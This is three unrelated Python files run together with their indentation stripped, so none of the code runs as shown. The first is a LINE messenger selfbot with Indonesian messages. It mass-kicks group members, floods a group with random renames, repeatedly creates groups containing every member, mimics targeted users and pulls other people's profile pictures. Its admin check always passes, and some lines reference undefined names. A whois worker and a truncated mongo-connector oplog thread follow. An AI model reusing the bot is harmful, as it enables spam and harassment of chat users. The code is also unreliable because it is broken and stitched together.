elif "Tr-en " in msg.text:
nk0 = msg.text.replace("Tr-en ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'en')
cl.sendText(msg.to,str(trans))
elif "Tr-ms " in msg.text:
nk0 = msg.text.replace("Tr-ms ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'ms')
cl.sendText(msg.to,str(trans))
elif "Tr-it " in msg.text:
nk0 = msg.text.replace("Tr-it ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'it')
cl.sendText(msg.to,str(trans))
elif "Tr-tr " in msg.text:
nk0 = msg.text.replace("Tr-tr ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'tr')
cl.sendText(msg.to,str(trans))
elif "Tr-my " in msg.text:
nk0 = msg.text.replace("Tr-my ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'my')
cl.sendText(msg.to,str(trans))
elif "Tr-af " in msg.text:
nk0 = msg.text.replace("Tr-af ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'af')
cl.sendText(msg.to,str(trans))
elif "Tr-sq " in msg.text:
nk0 = msg.text.replace("Tr-sq ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'sq')
cl.sendText(msg.to,str(trans))
elif "Tr-am " in msg.text:
nk0 = msg.text.replace("Tr-am ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'am')
cl.sendText(msg.to,str(trans))
elif "Tr-ar " in msg.text:
nk0 = msg.text.replace("Tr-ar ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'ar')
cl.sendText(msg.to,str(trans))
elif "Tr-hy " in msg.text:
nk0 = msg.text.replace("Tr-hy ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("","")
nk3 = nk2.rstrip()
_name = nk3
trans = translate(_name, 'hy')
cl.sendText(msg.to,str(trans))
#----------------UpdateFotoProfil----------------#
elif "Cpp" in msg.text:
if msg.from_ in admin or owner:
path = "syn.jpg"
cl.sendText(msg.to,"Update PP :")
cl.sendImage(msg.to,path)
cl.updateProfilePicture(path)
#----------------------------------------
#----------------------------------------------------------------------------
elif "Steal @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Steal @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
#-----------------------------------------------
elif "Steal " in msg.text:
if msg.from_ in admin or owner:
salsa = msg.text.replace("Steal ","")
Manis = cl.getContact(salsa)
Imoet = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cover = cl.channel.getCover(Manis)
except:
cover = ""
cl.sendText(msg.to,"Gambar Foto Profilenya")
cl.sendImageWithURL(msg.to,Imoet)
if cover == "":
cl.sendText(msg.to,"User tidak memiliki cover atau sejenisnya")
else:
cl.sendText(msg.to,"Gambar Covernya")
cl.sendImageWithURL(msg.to,cover)
#--------------------------CEK SIDER------------------------------
elif "setview" in msg.text:
subprocess.Popen("echo '' > dataSeen/"+msg.to+".txt", shell=True, stdout=subprocess.PIPE)
cl.sendText(msg.to, "Checkpoint checked!")
print "@setview"
elif "viewseen" in msg.text:
lurkGroup = ""
dataResult, timeSeen, contacts, userList, timelist, recheckData = [], [], [], [], [], []
with open('dataSeen/'+msg.to+'.txt','r') as rr:
contactArr = rr.readlines()
for v in xrange(len(contactArr) -1,0,-1):
num = re.sub(r'\n', "", contactArr[v])
contacts.append(num)
pass
contacts = list(set(contacts))
for z in range(len(contacts)):
arg = contacts[z].split('|')
userList.append(arg[0])
timelist.append(arg[1])
uL = list(set(userList))
for ll in range(len(uL)):
try:
getIndexUser = userList.index(uL[ll])
timeSeen.append(time.strftime("%H:%M:%S", time.localtime(int(timelist[getIndexUser]) / 1000)))
recheckData.append(userList[getIndexUser])
except IndexError:
conName.append('nones')
pass
contactId = cl.getContacts(recheckData)
for v in range(len(recheckData)):
dataResult.append(contactId[v].displayName + ' ('+timeSeen[v]+')')
pass
if len(dataResult) > 0:
tukang = "List Viewer\n*"
grp = '\n* '.join(str(f) for f in dataResult)
total = '\n\nTotal %i viewers (%s)' % (len(dataResult), datetime.now().strftime('%H:%M:%S') )
cl.sendText(msg.to, "%s %s %s" % (tukang, grp, total))
else:
cl.sendText(msg.to, "Belum ada viewers")
print "@viewseen"
#--------------------------CEK SIDER------------------------------
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
cl.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
cl.sendMessage(msg)
elif "Mimic:" in msg.text:
cmd = msg.text.replace("Mimic:","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Mimic on")
else:
cl.sendText(msg.to,"Mimic already on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Mimic off")
else:
cl.sendText(msg.to,"Mimic already off")
elif "Add:" in cmd:
target0 = msg.text.replace("Add:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Success added target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed")
break
elif "Del:" in cmd:
target0 = msg.text.replace("Del:","")
target1 = target0.lstrip()
target2 = target1.replace("@","")
target3 = target2.rstrip()
_name = target3
gInfo = cl.getGroup(msg.to)
targets = []
for a in gInfo.members:
if _name == a.displayName:
targets.append(a.mid)
if targets == []:
cl.sendText(msg.to,"No targets")
else:
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
break
except:
cl.sendText(msg.to,"Failed!")
break
elif cmd == "ListTarget":
if mimic["target"] == {}:
cl.sendText(msg.to,"No target")
else:
lst = "<<Lit Target>>"
total = len(mimic["target"])
for a in mimic["target"]:
if mimic["target"][a] == True:
stat = "On"
else:
stat = "Off"
lst += "\n☄1�7" + cl.getContact(mi_d).displayName + " | " + stat
cl.sendText(msg.to,lst + "\nTotal:" + total)
#----------------------------------------------------------------
#--------------------------------
elif msg.text in ["Gift","gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift1"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '696d7046-843b-4ed0-8aac-3113ed6c0733',
'PRDTYPE': 'THEME',
'MSGTPL': '6'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift2"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '8fe8cdab-96f3-4f84-95f1-6d731f0e273e',
'PRDTYPE': 'THEME',
'MSGTPL': '7'}
msg.text = None
cl.sendMessage(msg)
elif msg.text in ["Gift3"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'ae3d9165-fab2-4e70-859b-c14a9d4137c4',
'PRDTYPE': 'THEME',
'MSGTPL': '8'}
msg.text = None
cl.sendMessage(msg)
#------------------------------
#--------------------------------------
elif msg.text in ["hmm"]:
cl.sendText(msg.to,"Waduh kenapa gatel tenggorokan ya")
elif msg.text in ["welcome","Kam"]:
cl.sendText(msg.to,"Selamat datang di Group")
cl.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
#-------------- Add Friends ------------
elif "botadd @" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
if msg.from_ in admin or owner:
print "[Command]Add executing"
_name = msg.text.replace("botadd @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = cl.getGroup(msg.to)
gs = kc.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
cl.senText(msg.to, "Berhasil Menambah Kan Teman")
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak")
cl.sendText(msg.to,"Perintah ini Hanya Untuk Admin")
#-----------------------------------------------
elif msg.text in ["Respon"]:
if msg.from_ in admin or owner:
cl.sendText(msg.to,"Bot 1")
cl.sendText(msg.to,"Bot 2")
cl.sendText(msg.to,"Bot 3")
elif msg.text in ["Absen"]:
cl.sendText(msg.to,"👉★★★")
cl.sendText(msg.to,"👉★★★★")
cl.sendText(msg.to,"👉★★★★★")
cl.sendText(msg.to,"👉★★★★★★")
cl.sendText(msg.to,"👉★★★★★★★")
cl.sendText(msg.to,"👉Semua Hadir Boss...!!!\n\n[✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰]")
#-------------------------------------------------
elif "Getmid @" in msg.text:
if msg.from_ in admin or owner:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
#--------------------------
elif msg.text in ["Bot kemari"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in admin or owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.leaveGroup(i)
ki.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#--------------------------
elif "Bcast " in msg.text:
if msg.from_ in admin or owner:
bc = msg.text.replace("Bcast ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i,"======[BROADCAST]======\n\n"+bc+"\n\n#BROADCAST!!")
#--------------------------------------------------------
elif msg.text in ["Sp","Speed",".sp"]:
if msg.from_ in admin or owner:
start = time.time()
cl.sendText(msg.to, "Lagi Proses...")
cl.sendText(msg.to, "Santai...")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%s/Detik" % (elapsed_time))
#------------------------------------------------------------------
elif msg.text in ["Clearban"]:
if msg.from_ in admin or owner:
wait["blacklist"] = {}
cl.sendText(msg.to,"clear")
elif msg.text in ["Ban"]:
if msg.from_ in admin or owner:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim Kontak")
elif msg.text in ["Unban"]:
if msg.from_ in admin or owner:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim Kontak")
elif msg.text in ["Banlist"]:
if msg.from_ in admin or owner:
if wait["blacklist"] == {}:
cl.sendText(msg.to,"Tidak Ada")
else:
cl.sendText(msg.to,"Tunggu Sebentar Memuat Data")
mc = ""
for mi_d in wait["blacklist"]:
mc += "☄1�7 " +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["Cek ban"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
cl.sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin or owner:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
cl.sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
cl.kickoutFromGroup(msg.to,[jj])
cl.sendText(msg.to,"Bye...")
elif "Cancel" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
elif "/Random:" in msg.text:
if msg.from_ in admin or owner:
if msg.toType == 2:
strnum = msg.text.replace("/Random:","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "album" in msg.text:
if msg.from_ in admin or owner:
try:
albumtags = msg.text.replace("album","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecâ†â�1�7�1�71¤7 1�71¤7" in msg.text:
if msg.from_ in admin or owner:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecâ†â�1�7�1�71¤7 1�71¤7","")
cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "ranita cium " in msg.text:
if msg.from_ in admin or owner or mid:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["ranita glist"]: #Melihat List Group
if msg.from_ in owner:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["ranita glist2"]:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif "ranita asupka " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("barby asupka ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
cl.sendText(msg.to,"succes di invite boss, silahkan masuk...!!")
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif "ranita bye" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
cl.leaveGroup(msg.to)
except:
pass
elif "ranita megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("ranita megs ","")
ap = cl.getGroups([msg.to])
semua = [contact.mid for contact in ap[0].members]
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
elif "#rmegs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("#rmegs ","")
ap = cl.getGroups([msg.to])
semua = findAndAddContactsByMid(Mi_d)
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
klis=[cl]
team=random.choice(klis)
cl.findAndAddContactsByMid(Mi_d)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
cl.createGroup(gName, semua)
team.findAndAddContactsByMid(Mi_d)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
team.createGroup(gName, semua)
elif "Rrecover" in msg.text:
if msg.from_ in owner:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Rrecover", mi_d)
cl.sendText(msg.to,"Success recover")
elif "ranita spin" in msg.text:
if msg.from_ in owner:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.createGroup("Nah kan", mi_d)
cl.sendText(msg.to,"Success...!!!!")
elif msg.text in ["Remove all chat"]:
if msg.from_ in owner:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat Finish")
elif msg.text in ["ranita muach"]:
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "ua7fb5762d5066629323d113e1266e8ca',"}
cl.sendMessage(msg)
elif msg.text in ["ranita","Ranita"]:
if msg.from_ in owner:
cl.sendText(msg.to,"Ranita masih aktif Yank...!!!")
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n-> " + Nama
wait2['ROM'][op.param1][op.param2] = "-> " + Nama
wait2['setTime'][msg.to] = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
whois_worker.py
|
from PyQt5.QtCore import QThread, pyqtSignal
from tqdm import tqdm
from time import sleep
import os
import whois # pip install whois
import multiprocessing as mp
from domainhelper import DomainHelper
class WhoisWorker(QThread):
def __init__(self, mail_objects):
super().__init__()
self.progress_reporter = WhoisProgressReporter()
self.mail_objects = mail_objects
def run(self):
PROCESSES = 8
with mp.Manager() as manager:
queue = mp.Queue()
whois_cache = manager.dict()
domain_counter = mp.Value('i', 0)
domain_set = set()
for mail in self.mail_objects:
for domain in mail.collect_domains():
domain_set.add(domain)
for domain in domain_set:
queue.put(domain)
domain_counter.value += 1
del (domain_set)
done_counter = mp.Value('i', 0)
self.progress_reporter.done_counter = done_counter
self.progress_reporter.domain_counter = domain_counter
p0 = self.progress_reporter
worker = []
for i in range(PROCESSES):
wProcess = mp.Process(target=parallel_whois_worker, args=(queue, whois_cache, done_counter))
worker.append(wProcess)
for w in worker:
w.start()
p0.start()
# for w in worker:
# w.join()
while not queue.empty():
sleep(10)
print("Whois complete")
sleep(10)
for w in worker:
w.terminate()
p0.terminate()
print("Whois done")
DomainHelper().whois_cache = dict(whois_cache)
del (whois_cache)
for mail in tqdm(self.mail_objects, unit=" E-Mails"):
mail.fill_whois_fields()
def parallel_whois_worker(domain_queue, whois_cache, done_counter):
while True:
if domain_queue.empty():
break
try:
domain = domain_queue.get()
if whois_cache.get(domain) is None:
entry = whois_request(domain)
whois_cache[domain] = entry
with done_counter.get_lock():
done_counter.value += 1
except:
break
def whois_request(domain):
try:
""" Returns relevant whois data for given domain. """
w = whois.query(domain).__dict__
domainEntry = {
"country": w.get('registrant_country'),
"organization": w.get('org'),
"holderName": w.get('name'),
"holderAddr": w.get('address')
}
return domainEntry
except:
domainEntry = {
"country": "WHOIS REQUEST FAILED",
"organization": "WHOIS REQUEST FAILED",
"holderName": "WHOIS REQUEST FAILED",
"holderAddr": "WHOIS REQUEST FAILED"
}
return domainEntry
class WhoisProgressReporter(QThread):
_pbar_val_signal = pyqtSignal(int)
_pbar_val_update_signal = pyqtSignal(int)
_pbar_init_signal = pyqtSignal(str, str, int)
_pbar_finished_signal = pyqtSignal()
def __init__(self):
super().__init__()
self.domain_counter = None
self.done_counter = None
def run(self):
self._pbar_init_signal.emit("WHOIS", "Domains", self.domain_counter.value)
with tqdm(total=self.domain_counter.value, unit=" Domains") as pbar:
while True:
with self.done_counter.get_lock():
pbar.update(self.done_counter.value)
self._pbar_val_update_signal.emit(self.done_counter.value)
self.done_counter.value = 0
sleep(2)
|
oplog_manager.py
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tails the oplog of a shard and returns entries
"""
import bson
import logging
try:
import Queue as queue
except ImportError:
import queue
import sys
import time
import threading
import pymongo
from pymongo import CursorType, errors as pymongo_errors
from mongo_connector import errors, util
from mongo_connector.constants import DEFAULT_BATCH_SIZE
from mongo_connector.gridfs_file import GridFSFile
from mongo_connector.util import log_fatal_exceptions, retry_until_ok
import mongo_connector.plugin_manager as PluginManager
LOG = logging.getLogger(__name__)
class ReplicationLagLogger(threading.Thread):
"""Thread that periodically logs the current replication lag.
"""
def __init__(self, opman, interval):
super(ReplicationLagLogger, self).__init__()
self.opman = opman
self.interval = interval
self.daemon = True
def log_replication_lag(self):
checkpoint = self.opman.checkpoint
if checkpoint is None:
return
newest_write = retry_until_ok(self.opman.get_last_oplog_timestamp)
if newest_write < checkpoint:
# OplogThread will perform a rollback, don't log anything
return
lag_secs = newest_write.time - checkpoint.time
if lag_secs > 0:
LOG.info("OplogThread for replica set '%s' is %s seconds behind "
"the oplog.",
self.opman.replset_name, lag_secs)
else:
lag_inc = newest_write.inc - checkpoint.inc
if lag_inc > 0:
LOG.info("OplogThread for replica set '%s' is %s entries "
"behind the oplog.",
self.opman.replset_name, lag_inc)
else:
LOG.info("OplogThread for replica set '%s' is up to date "
"with the oplog.",
self.opman.replset_name)
def run(self):
while self.opman.is_alive():
self.log_replication_lag()
time.sleep(self.interval)
class OplogThread(threading.Thread):
"""Thread that tails an oplog.
Calls the appropriate method on DocManagers for each relevant oplog entry.
"""
def __init__(self, primary_client, doc_managers,
oplog_progress_dict, namespace_config,
mongos_client=None, **kwargs):
super(OplogThread, self).__init__()
self.batch_size = kwargs.get('batch_size', DEFAULT_BATCH_SIZE)
# The connection to the primary for this replicaSet.
self.primary_client = primary_client
# The connection to the mongos, if there is one.
self.mongos_client = mongos_client
# Are we allowed to perform a collection dump?
self.collection_dump = kwargs.get('collection_dump', True)
# The document manager for each target system.
# These are the same for all threads.
self.doc_managers = doc_managers
# Boolean describing whether or not the thread is running.
self.running = True
# Stores the timestamp of the last oplog entry read.
self.checkpoint = None
# A dictionary that stores OplogThread/timestamp pairs.
# Represents the last checkpoint for a OplogThread.
self.oplog_progress = oplog_progress_dict
# The namespace configuration
self.namespace_config = namespace_config
# Whether the collection dump gracefully handles exceptions
self.continue_on_error = kwargs.get('continue_on_error', False)
LOG.info('OplogThread: Initializing oplog thread')
self.oplog = self.primary_client.local.oplog.rs
self.replset_name = (
self.primary_client.admin.command('ismaster')['setName'])
if not self.oplog.find_one():
err_msg = 'OplogThread: No oplog for thread:'
LOG.warning('%s %s' % (err_msg, self.primary_client))
def _should_skip_entry(self, entry):
"""Determine if this oplog entry should be skipped.
This has the possible side effect of modifying the entry's namespace
and filtering fields from updates and inserts.
"""
# Don't replicate entries resulting from chunk moves
if entry.get("fromMigrate"):
return True, False
# Ignore no-ops
if entry['op'] == 'n':
return True, False
ns = entry['ns']
if '.' not in ns:
return True, False
coll = ns.split('.', 1)[1]
# Ignore system collections
if coll.startswith("system."):
return True, False
# Ignore GridFS chunks
if coll.endswith('.chunks'):
return True, False
is_gridfs_file = False
if coll.endswith(".files"):
ns = ns[:-len(".files")]
if self.namespace_config.gridfs_namespace(ns):
is_gridfs_file = True
else:
return True, False
# Commands should not be ignored, filtered, or renamed. Renaming is
# handled by the DocManagers via the CommandHelper class.
if coll == "$cmd":
return False, False
# Rename or filter out namespaces that are ignored keeping
# included gridfs namespaces.
namespace = self.namespace_config.lookup(ns)
if namespace is None:
LOG.debug("OplogThread: Skipping oplog entry: "
"'%s' is not in the namespace configuration." % (ns,))
return True, False
# Update the namespace.
entry['ns'] = namespace.dest_name
# Take fields out of the oplog entry that shouldn't be replicated.
# This may nullify the document if there's nothing to do.
if not self.filter_oplog_entry(
entry, include_fields=namespace.include_fields,
exclude_fields=namespace.exclude_fields):
return True, False
return False, is_gridfs_file
@log_fatal_exceptions
def run(self):
"""Start the oplog worker.
"""
ReplicationLagLogger(self, 30).start()
LOG.debug("OplogThread: Run thread started")
while self.running is True:
LOG.debug("OplogThread: Getting cursor")
cursor, cursor_empty = retry_until_ok(self.init_cursor)
# we've fallen too far behind
if cursor is None and self.checkpoint is not None:
err_msg = "OplogThread: Last entry no longer in oplog"
effect = "cannot recover!"
LOG.error('%s %s %s' % (err_msg, effect, self.oplog))
self.running = False
continue
if cursor_empty:
LOG.debug("OplogThread: Last entry is the one we "
"already processed. Up to date. Sleeping.")
time.sleep(1)
continue
last_ts = None
remove_inc = 0
upsert_inc = 0
update_inc = 0
try:
LOG.debug("OplogThread: about to process new oplog entries")
while cursor.alive and self.running:
LOG.debug("OplogThread: Cursor is still"
" alive and thread is still running.")
for n, entry in enumerate(cursor):
# Break out if this thread should stop
if not self.running:
break
LOG.debug("OplogThread: Iterating through cursor,"
" document number in this cursor is %d"
% n)
skip, is_gridfs_file = self._should_skip_entry(entry)
if skip:
# update the last_ts on skipped entries to ensure
# our checkpoint does not fall off the oplog. This
# also prevents reprocessing skipped entries.
last_ts = entry['ts']
continue
# Sync the current oplog operation
operation = entry['op']
ns = entry['ns']
configs = self.namespace_config.get_plugin_configs(ns)
plugins = PluginManager.resolve(configs)
passthru_op = PluginManager.docs_index_needed(configs)
timestamp = util.bson_ts_to_long(entry['ts'])
for docman in self.doc_managers:
try:
LOG.debug("OplogThread: Operation for this "
"entry is %s" % str(operation))
if len(configs) > 0 and len(plugins) > 0:
LOG.debug("OplogThread: invoking "
"plugins for op %s entry %r",
operation, entry['o'])
self.invoke_plugins_for_doc(operation,
entry['o'], plugins, docman)
if not passthru_op:
continue
# Remove
if operation == 'd':
docman.remove(
entry['o']['_id'], ns, timestamp)
remove_inc += 1
# Insert
elif operation == 'i': # Insert
# Retrieve inserted document from
# 'o' field in oplog record
doc = entry.get('o')
# Extract timestamp and namespace
if is_gridfs_file:
db, coll = ns.split('.', 1)
gridfile = GridFSFile(
self.primary_client[db][coll],
doc)
docman.insert_file(
gridfile, ns, timestamp)
else:
docman.upsert(doc, ns, timestamp)
upsert_inc += 1
# Update
elif operation == 'u':
docman.update(entry['o2']['_id'],
entry['o'],
ns, timestamp)
update_inc += 1
# Command
elif operation == 'c':
# use unmapped namespace
doc = entry.get('o')
docman.handle_command(doc,
entry['ns'],
timestamp)
except errors.OperationFailed:
LOG.exception(
"Unable to process oplog document %r"
% entry)
except errors.ConnectionFailed:
LOG.exception(
"Connection failed while processing oplog "
"document %r" % entry)
if (remove_inc + upsert_inc + update_inc) % 1000 == 0:
LOG.debug(
"OplogThread: Documents removed: %d, "
"inserted: %d, updated: %d so far" % (
remove_inc, upsert_inc, update_inc))
LOG.debug("OplogThread: Doc is processed.")
last_ts = entry['ts']
# update timestamp per batch size
# n % -1 (default for self.batch_size) == 0 for all n
if n % self.batch_size == 1:
self.update_checkpoint(last_ts)
last_ts = None
# update timestamp after running through oplog
if last_ts is not None:
LOG.debug("OplogThread: updating checkpoint after "
"processing new oplog entries")
self.update_checkpoint(last_ts)
except (pymongo.errors.AutoReconnect,
